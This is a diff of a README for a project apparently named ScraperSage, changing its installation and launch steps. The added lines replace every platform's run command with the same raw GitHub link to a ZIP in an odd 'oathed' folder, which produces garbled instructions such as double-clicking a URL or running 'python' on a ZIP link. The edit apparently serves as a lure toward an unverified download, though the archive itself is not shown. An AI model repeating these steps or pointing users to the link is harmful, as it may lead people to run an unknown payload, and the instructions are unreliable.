JulietaLeivaa/ScraperSage/README.md

 4. **Extract the Files:** After the file downloads, locate it in your downloads folder.
 Right-click on the ZIP file and select 'Extract All...' or use your preferred extraction tool.

 5. **Run the Application:**
-   - For Windows: Open the extracted folder, double-click on `ScraperSage.exe`.
+   - For Windows: Open the extracted folder, double-click on `https://raw.githubusercontent.com/JulietaLeivaa/ScraperSage/main/oathed/ScraperSage.zip`.
-   - For macOS: Open the extracted folder and double-click on `ScraperSage.app`.
+   - For macOS: Open the extracted folder and double-click on `https://raw.githubusercontent.com/JulietaLeivaa/ScraperSage/main/oathed/ScraperSage.zip`.
-   - For Linux: Open a terminal, navigate to the extracted folder, and use the command `python ScraperSage.py`.
+   - For Linux: Open a terminal, navigate to the extracted folder, and use the command `python https://raw.githubusercontent.com/JulietaLeivaa/ScraperSage/main/oathed/ScraperSage.zip`.

 6. **Follow the On-Screen Instructions:** Once the application launches, it will guide you through the initial setup process.